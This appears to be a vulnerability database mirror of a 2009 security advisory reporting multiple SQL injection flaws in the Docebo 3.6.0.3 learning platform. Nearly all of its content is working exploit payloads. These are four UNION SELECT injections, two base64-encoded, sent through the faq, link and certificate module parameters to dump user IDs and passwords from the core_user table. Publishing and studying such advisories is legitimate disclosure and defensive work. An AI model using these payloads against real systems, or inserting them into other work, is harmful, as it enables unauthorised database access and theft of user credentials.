Lucene search
+L

Docebo 3.6.0.3 SQL Injection

🗓️ 12 Oct 2009 00:00:00Reported by Andrea FabriziType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Docebo 3.6.0.3 SQL Injection, multiple examples

Code
`**************************************************************  
Application: Docebo  
Version affected: 3.6.0.3  
Website: http://www.docebo.com  
Discovered By: Andrea Fabrizi  
Email: [email protected]  
Web: http://www.andreafabrizi.it  
Vuln: Multiple SQL-Injection Vulnerabilities  
**************************************************************  
  
########## EXAMPLE 1 ##########  
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user  
-- " | base64  
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g  
  
-> http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g  
###############################  
  
########## EXAMPLE 2 ##########  
roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user  
-- " | base64  
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=  
  
-> http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=  
###############################  
  
########## EXAMPLE 3 ##########  
-> http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op=elemmetacertificate&id_certificate=3222  
union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2  
###############################  
  
########## EXAMPLE 4 ##########  
-> http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123  
union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2  
###############################  
  
--  
Andrea Fabrizi  
http://www.andreafabrizi.it  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Oct 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
22